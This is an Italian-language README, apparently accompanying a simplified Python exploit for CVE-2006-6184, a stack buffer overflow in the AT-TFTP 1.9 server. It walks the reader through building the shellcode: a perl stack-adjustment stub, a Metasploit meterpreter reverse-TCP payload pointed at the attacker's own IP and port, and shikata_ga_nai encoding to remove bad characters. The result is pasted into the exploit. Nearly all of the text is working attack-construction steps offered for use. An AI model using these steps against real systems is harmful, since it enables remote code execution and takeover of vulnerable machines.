
versione semplificata di https://github.com/shauntdergrigorian/cve-2006-6184
Questo è un exploit standalone basato su Python per CVE-2006-6184. Questo exploit sfrutta un buffer overflow basato sullo stack in Allied Telesyn TFTP Server (AT-TFTP) 1.9, e probabilmente versioni precedenti, consentendo a un attaccante remoto di causare un denial of service o eseguire codice arbitrario.
Non pensavi che fosse così facile, vero? Il payload deve essere personalizzato per includere il proprio indirizzo IP e porta in ascolto, quindi dovrai generarlo da solo. Per farlo, segui i seguenti passaggi:
1.) Inserisci quanto segue per creare un file esadecimale della quantità da sottrarre dal puntatore dello stack (3500):
perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj
2.) Successivamente, usa il seguente comando per creare un payload meterpreter a stadi:
msfpayload windows/meterpreter/reverse_nonx_tcp LHOST=[tuo IP] LPORT=[tua porta] R > payload
3.) Quindi, combina i due file appena creati.
cat stackadj payload > shellcode
4.) Infine, eliminiamo i caratteri indesiderati.
cat shellcode | msfencode -b '\x00' -e x86/shikata_ga_nai -t python
Inserisci l'output come valore della variabile "payload".